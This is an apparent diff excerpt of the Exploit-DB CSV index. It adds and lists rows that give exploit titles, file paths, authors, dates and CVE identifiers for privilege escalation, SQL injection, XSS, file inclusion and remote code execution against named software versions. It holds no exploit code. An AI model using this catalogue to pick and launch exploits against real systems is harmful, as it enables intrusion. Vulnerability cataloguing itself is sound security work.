25134,exploits/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,local,linux,,2013-05-01,2017-06-21,1,CVE-2012-0809;OSVDB-78659,,,http://www.exploit-db.com/screenshots/misc/screen-shot-2013-05-02-at-60148-am.png,,http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
51217,exploits/linux/local/51217.sh,"sudo 1.8.0 to 1.9.12p1 - Privilege Escalation",2023-04-03,n3m1.sys,local,linux,,2023-04-03,2023-04-03,0,CVE-2023-22809,,,,,
37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",local,linux,,2015-07-29,2017-06-21,1,CVE-2015-5602;OSVDB-125548,,,http://www.exploit-db.com/screenshots/idlt38000/sudoersx.png,,
42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,,2017-06-15,2017-06-20,0,CVE-2017-1000367,,Linux_sudo_CVE-2017-1000367.c,,,http://seclists.org/oss-sec/2017/q2/470
48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,,2020-02-11,2020-08-20,0,CVE-2019-18634,,,,,https://github.com/Plazmaz/CVE-2019-18634/blob/b348e738a83fd4180b3ec26ed216535547f3bb8a/self-contained.sh
@ -10350,6 +10353,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19684,exploits/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Local Buffer Overflow",1999-12-20,"Last Stage of Delirium",local,multiple,,1999-12-20,2012-07-08,1,OSVDB-92006;OSVDB-92005;OSVDB-92004;OSVDB-92003;OSVDB-85842,,,,,https://www.securityfocus.com/bid/884/info
47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2019-12181,,,,,https://github.com/bcoles/local-exploits/blob/aee19e0c138a5861167e6e13f7737b63ca71999f/CVE-2019-12181/SUroot
47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,,2019-08-01,2019-08-20,0,CVE-2019-13069,,,,,
51225,exploits/multiple/local/51225.txt,"sleuthkit 4.11.1 - Command Injection",2023-04-03,"Dino Barlattani",local,multiple,,2023-04-03,2023-04-03,0,CVE-2022-45639,,,,,
49527,exploits/multiple/local/49527.txt,"SmartFoxServer 2X 2.17.0 - Credentials Disclosure",2021-02-08,LiquidWorm,local,multiple,,2021-02-08,2021-03-11,1,,,,,,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",2021-02-08,LiquidWorm,local,multiple,,2021-02-08,2021-03-11,1,,,,,,
7129,exploits/multiple/local/7129.sh,"Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalation",2008-11-15,kingcope,local,multiple,,2008-11-14,2017-10-04,1,,,,,,
@ -11437,6 +11441,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49980,exploits/multiple/webapps/49980.txt,"Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)",2021-06-11,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-11,2021-06-11,0,CVE-2021-33904,,,,,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34370,,,,,
49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,,2020-11-27,2020-11-27,0,CVE-2020-16171,,,,,
51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2021-02-09,0,,,,,,
@ -11810,6 +11815,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple,,2016-01-14,2016-01-14,0,OSVDB-133027,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5291.php
39235,exploits/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",webapps,multiple,9090,2016-01-14,2016-01-14,0,OSVDB-132889;OSVDB-132888;OSVDB-132887,,,,,
39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,,2016-02-02,2016-02-02,0,,,,,,
51222,exploits/multiple/webapps/51222.txt,"ManageEngin AMP 4.3.0 - File-path-traversal",2023-04-03,nu11secur1ty,webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
49885,exploits/multiple/webapps/49885.py,"ManageEngine ADSelfService Plus 6.1 - CSV Injection",2021-05-19,"Metin Yunus Kandemir",webapps,multiple,,2021-05-19,2021-05-19,0,,,,,,
48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,,2020-03-06,2020-03-06,0,,,,,,https://srcincite.io/pocs/src-2020-0011.py.txt
43892,exploits/multiple/webapps/43892.txt,"ManageEngine Desktop Central - Create Administrator",2015-01-15,"Pedro Ribeiro",webapps,multiple,,2018-01-25,2018-01-25,0,CVE-2014-7862,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_dc9_admin.txt
@ -12036,6 +12042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,,2020-12-21,2020-12-21,0,,,,,,
49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",2021-05-21,nu11secur1ty,webapps,multiple,,2021-05-21,2021-05-21,0,,,,,http://www.exploit-db.comspotweb-1.4.9.zip,
13918,exploits/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",webapps,multiple,,2010-06-17,,1,CVE-2010-1622;OSVDB-65661,,,,,
51218,exploits/multiple/webapps/51218.txt,"SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)",2023-04-03,geeklinuxman,webapps,multiple,,2023-04-03,2023-04-03,0,CVE-2022-47870,,,,,
17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - (Authenticated) Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple,,2011-04-15,2011-04-15,1,,,,,http://www.exploit-db.comsql-ledger-2.8.33.tar.gz,
24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,webapps,multiple,,2013-01-24,2018-03-15,1,OSVDB-89701,,,,http://www.exploit-db.comSQliteManager-1.2.4.tar.gz,
50237,exploits/multiple/webapps/50237.py,"Strapi 3.0.0-beta - Set Password (Unauthenticated)",2021-08-30,"David Anglada",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-18818,,,,,
@ -13761,6 +13768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37963,exploits/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection",2012-10-18,cr4wl3r,webapps,php,,2012-10-18,2015-08-25,1,OSVDB-92070,,,,,https://www.securityfocus.com/bid/56110/info
37962,exploits/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting",2012-10-18,cr4wl3r,webapps,php,,2012-10-18,2015-08-25,1,OSVDB-91935,,,,,https://www.securityfocus.com/bid/56110/info
37961,exploits/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection",2012-10-18,cr4wl3r,webapps,php,,2012-10-18,2015-08-25,1,OSVDB-92069,,,,,https://www.securityfocus.com/bid/56110/info
51219,exploits/php/webapps/51219.txt,"AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,php,,2023-04-03,2023-04-03,0,,,,,,
37450,exploits/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'Uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",webapps,php,,2012-06-23,2015-07-01,1,,,,,,https://www.securityfocus.com/bid/54170/info
4652,exploits/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php?id' Local File Inclusion",2007-11-24,Crackers_Child,webapps,php,,2007-11-23,,1,OSVDB-38814;CVE-2007-6129,,,,,
42799,exploits/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php,,2017-09-27,2017-09-28,0,CVE-2017-14841,,,,,
@ -13944,6 +13952,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24451,exploits/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,webapps,php,,2013-02-05,2013-02-05,0,OSVDB-89830;OSVDB-89829,,,,,
14050,exploits/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",webapps,php,,2010-06-25,2010-11-12,1,OSVDB-65837;OSVDB-65836,,,,http://www.exploit-db.comarsc3.3-pre2.zip,
35816,exploits/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections",2011-06-01,"High-Tech Bridge SA",webapps,php,,2011-06-01,2015-01-18,1,,,,,,https://www.securityfocus.com/bid/48083/info
51214,exploits/php/webapps/51214.txt,"Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-03,0,CVE-2023-23161,,,,,
51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-03,0,CVE-2023-23163,,,,,
51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-03,0,CVE-2023-23162,,,,,
34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
@ -15345,6 +15356,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7532,exploits/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-54361;CVE-2008-5853;OSVDB-54360,,,,,http://www.bugreport.ir/index_59.htm
50572,exploits/php/webapps/50572.py,"Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)",2021-12-09,0z09e,webapps,php,,2021-12-09,2021-12-09,0,,,,,"http://www.exploit-db.comChikitsa 2.0.2.zip",
50571,exploits/php/webapps/50571.py,"Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)",2021-12-09,0z09e,webapps,php,,2021-12-09,2021-12-09,0,,,,,"http://www.exploit-db.comChikitsa 2.0.2.zip",
51202,exploits/php/webapps/51202.txt,"ChiKoi v1.0 - SQL Injection",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
43271,exploits/php/webapps/43271.txt,"Child Care Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-10,2017-12-13,0,CVE-2017-17608,,,,,
12643,exploits/php/webapps/12643.pl,"ChillyCMS - Blind SQL Injection",2010-05-18,IHTeam,webapps,php,,2010-05-17,,0,,,,,,
11781,exploits/php/webapps/11781.html,"ChillyCMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php,,2010-03-16,,1,OSVDB-63029,,,,,
@ -17705,6 +17717,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5846,exploits/php/webapps/5846.txt,"eroCMS 1.4 - 'site' SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,2016-12-08,1,OSVDB-46287;CVE-2008-2792,,,,,
11689,exploits/php/webapps/11689.txt,"Eros Erotik Webkatalog - 'start.php?id' SQL Injection",2010-03-11,"Easy Laster",webapps,php,,2010-03-10,,1,OSVDB-62902;CVE-2010-0964,,,,,
11489,exploits/php/webapps/11489.txt,"Erotik Auktionshaus - 'news.php' SQL Injection",2010-02-17,"Easy Laster",webapps,php,,2010-02-16,,1,OSVDB-62369;CVE-2010-0720,,,,,
51220,exploits/php/webapps/51220.txt,"ERPGo SaaS 3.9 - CSV Injection",2023-04-03,"Sajibe Kanti",webapps,php,,2023-04-03,2023-04-03,0,,,,,,
22907,exploits/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",webapps,php,,2012-11-25,2012-11-25,1,OSVDB-87868,,,,http://www.exploit-db.comescms_alpha_v0_1.zip,
21084,exploits/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,webapps,php,,2012-09-05,2012-09-05,0,OSVDB-86248,,,,,https://www.vulnerability-lab.com/get_content.php?id=675
14960,exploits/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,webapps,php,,2010-09-09,2010-09-10,1,CVE-2010-3456;OSVDB-67944,,,,http://www.exploit-db.comessdownload1.0.zip,
@ -18913,6 +18926,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9088,exploits/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,webapps,php,,2009-07-08,,1,,,,,,
24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php,,2013-02-05,2013-02-05,1,OSVDB-89960;OSVDB-89884;OSVDB-89883;OSVDB-89881,,,,http://www.exploit-db.comglossword-1.8.12.zip,
24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php,,2013-02-05,2013-02-05,1,OSVDB-89882,,,,http://www.exploit-db.comglossword-1.8.3.tar.bz2,
51234,exploits/php/webapps/51234.txt,"GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34128,,,,,
7911,exploits/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,webapps,php,,2009-01-28,,1,,,,,,
26366,exploits/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,webapps,php,,2013-06-21,2013-06-21,0,OSVDB-94711;OSVDB-94463;OSVDB-94462;CVE-2013-2227;CVE-2013-2226;OSVDB-94451,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php
26530,exploits/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",webapps,php,,2013-07-01,2016-11-12,0,CVE-2013-2225;OSVDB-94683,,,,http://www.exploit-db.comglpi-0.83.9.tar.gz,https://www.securityfocus.com/bid/60823/info
@ -18921,8 +18935,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38407,exploits/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",webapps,php,,2015-10-06,2015-10-06,0,OSVDB-128612,,,,http://www.exploit-db.comglpi-0.85.5.tar.gz,
39751,exploits/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",webapps,php,80,2016-04-29,2016-04-29,1,,,,,http://www.exploit-db.comglpi-0.90.2.tar.gz,https://www.htbridge.com/advisory/HTB23301
42262,exploits/php/webapps/42262.txt,"GLPI 0.90.4 - SQL Injection",2017-06-27,"Eric CARTER",webapps,php,,2017-06-27,2017-06-27,1,CVE-2016-7508,"SQL Injection (SQLi)",,,,
51229,exploits/php/webapps/51229.txt,"GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34127,,,,,
49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,,2021-06-14,2021-06-14,0,CVE-2020-11060,,,,,
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51231,exploits/php/webapps/51231.txt,"GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31068,,,,,
51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
26989,exploits/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,webapps,php,,2005-12-29,2013-07-22,1,CVE-2005-4627;OSVDB-22083,,,,,https://www.securityfocus.com/bid/16081/info
@ -22977,6 +22996,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3516,exploits/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,webapps,php,,2007-03-18,,1,OSVDB-34523;CVE-2007-1552,,,,,http://www.aeroxteam.fr/advisory-MetaForum-0.513b.txt
1855,exploits/php/webapps/1855.txt,"metajour 2.1 - 'system_path' Remote File Inclusion",2006-05-31,Kacper,webapps,php,,2006-05-30,2016-07-29,1,OSVDB-39480;CVE-2006-2768;OSVDB-39476;OSVDB-39475;OSVDB-39474;OSVDB-39473;OSVDB-39472;OSVDB-39471;OSVDB-39470;OSVDB-39469;OSVDB-39468;OSVDB-39467;OSVDB-39466;OSVDB-39465;OSVDB-39464;OSVDB-39463;OSVDB-39462;OSVDB-39461;OSVDB-39460;OSVDB-39459;OSVDB-39458;OSVDB-39457;OSVDB-39456;OSVDB-39455;OSVDB-39454;OSVDB-39453;OSVDB-39452;OSVDB-39451;OSVDB-39450;OSVDB-39449;OSVDB-39448;OSVDB-39447;OSVDB-39446;OSVDB-39445;OSVDB-39444;OSVDB-39443;OSVDB-39442;OSVDB-39441;OSVDB-39440;OSVDB-39439;OSVDB-39438;OSVDB-39437;OSVDB-39436;OSVDB-39435;OSVDB-39434;OSVDB-39433;OSVDB-39432;OSVDB-39431;OSVDB-39430;OSVDB-39429;OSVDB-39428;OSVDB-39427;OSVDB-39426;OSVDB-39425;OSVDB-39424;OSVDB-39423;OSVDB-39422;OSVDB-39421;OSVDB-39420;OSVDB-39419;OSVDB-39418;OSVDB-39417;OSVDB-39416;OSVDB-39415;OSVDB-39414;OSVDB-39413;OSVDB-39412;OSVDB-39411;OSVDB-39410;OSVDB-39409;OSVDB-39408;OSVDB-39407;OSVDB-39406;OSVDB-39405;OSVDB-39404;OSVDB-39403;OSVDB-39402;OSVDB-39401,,,,http://www.exploit-db.commetajour2_1_0.zip,
50596,exploits/php/webapps/50596.txt,"meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)",2021-12-14,LiquidWorm,webapps,php,,2021-12-14,2021-12-14,0,,,,,,
51204,exploits/php/webapps/51204.txt,"Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)",2023-04-03,"Mohammed Chemouri",webapps,php,,2023-04-03,2023-04-03,0,CVE-2023-0084,,,,,
15360,exploits/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,webapps,php,,2010-10-31,2015-07-12,0,,,,,,
15389,exploits/php/webapps/15389.php,"MetInfo 3.0 - 'FCKeditor' Arbitrary File Upload",2010-11-02,[sh3n],webapps,php,,2010-11-02,2010-11-02,0,,,,,http://www.exploit-db.commetinfo3.0.zip,
15496,exploits/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,webapps,php,,2010-11-12,2010-11-12,1,OSVDB-65839;CVE-2010-4976,,,,,
@ -23566,6 +23586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49696,exploits/php/webapps/49696.js,"MyBB 1.8.25 - Chained Remote Command Execution",2021-03-22,SivertPL,webapps,php,,2021-03-22,2021-03-23,0,CVE-2021-27890;CVE-2021-27889,,,,,
49699,exploits/php/webapps/49699.txt,"MyBB 1.8.25 - Poll Vote Count SQL Injection",2021-03-23,SivertPL,webapps,php,,2021-03-23,2021-03-23,0,CVE-2021-27946,,,,,
50924,exploits/php/webapps/50924.py,"MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)",2022-05-11,Altelus,webapps,php,,2022-05-11,2022-05-11,0,CVE-2022-24734,,,,,
51213,exploits/php/webapps/51213.py,"MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)",2023-04-03,lUc1f3r11,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
40749,exploits/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",webapps,php,80,2016-11-10,2016-11-14,0,,,,,http://www.exploit-db.commybb_1806.zip,
40396,exploits/php/webapps/40396.txt,"MyBB 1.8.6 - SQL Injection",2016-09-19,"Curesec Research Team",webapps,php,80,2016-09-19,2016-09-19,0,,,,,http://www.exploit-db.commybb_1806.zip,
35224,exploits/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,webapps,php,80,2014-11-13,2014-11-13,0,OSVDB-114675;OSVDB-114610;OSVDB-114609;OSVDB-114608;OSVDB-114607;CVE-2014-9241;CVE-2014-9240,,,,http://www.exploit-db.commybb_1801.zip,
@ -25176,6 +25197,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3000,exploits/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,webapps,php,,2006-12-23,2016-09-21,1,OSVDB-31587;CVE-2006-6765,,,,http://www.exploit-db.compagetool-1.07.tar.gz,
7255,exploits/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,webapps,php,,2008-11-26,,1,OSVDB-57359;CVE-2008-7067,,,,,
3783,exploits/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure",2007-04-23,GoLd_M,webapps,php,,2007-04-22,2016-09-30,1,OSVDB-35312;CVE-2007-2200;OSVDB-35311,,,,http://www.exploit-db.compagode-0.5.8.tar.gz,
51235,exploits/php/webapps/51235.py,"Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection",2023-04-03,r3nt0n,webapps,php,,2023-04-03,2023-04-03,0,CVE-2023-23488,,,,,
43334,exploits/php/webapps/43334.txt,"Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17651,,,,,
16901,exploits/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,webapps,php,,2010-04-30,2011-03-06,1,CVE-2006-1551;OSVDB-24618,"Metasploit Framework (MSF)",,,,http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php
1672,exploits/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,webapps,php,,2006-04-12,,1,,,,,,
@ -27327,6 +27349,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"SQL Injection (SQLi)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
51201,exploits/php/webapps/51201.txt,"pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",webapps,php,80,2014-02-18,2014-03-15,0,OSVDB-103445;OSVDB-103444,,,,http://www.exploit-db.compinacms-master.zip,
4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php,,2007-10-10,2016-10-20,1,OSVDB-37879;CVE-2007-5387,,,,http://www.exploit-db.compindorama-0.1.zip,
48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,,2020-04-15,2020-04-15,0,,,,,,
@ -27832,6 +27855,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23486,exploits/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",webapps,php,,2003-12-27,2012-12-18,1,,,,,,https://www.securityfocus.com/bid/9308/info
38377,exploits/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure",2013-03-11,"Chris John Riley",webapps,php,,2013-03-11,2015-10-01,1,CVE-2013-2503;OSVDB-91126,,,,,https://www.securityfocus.com/bid/58425/info
